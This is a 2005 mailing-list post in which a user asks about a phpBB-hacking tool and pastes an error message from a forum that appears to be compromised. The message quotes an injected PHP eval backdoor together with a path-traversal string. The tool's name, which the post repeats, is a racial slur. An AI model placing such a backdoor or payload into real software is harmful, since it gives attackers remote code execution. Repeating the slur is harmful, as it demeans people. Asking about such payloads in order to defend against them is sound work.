Full Disclosure mailing list archives

A phpBB hacker tool called "nigga".


From: Feher Tamas <etomcat () freemail hu>
Date: Thu, 17 Mar 2005 16:19:37 +0100 (CET)

Hello,

Have you heard of a tool named "nigga" which hacks phpBB
forums? What effects does it have on the compromised system?
is it a serious break-in or just an automated something?

http://url.was.here/forum/viewtopic.php?t=number_was_here
phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));
exit();// 
/../../../../../../../../../../../../../../../../../../../tmp
template config file

Thanks in advance, Sincerely: Tamas Feher.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/


Current thread: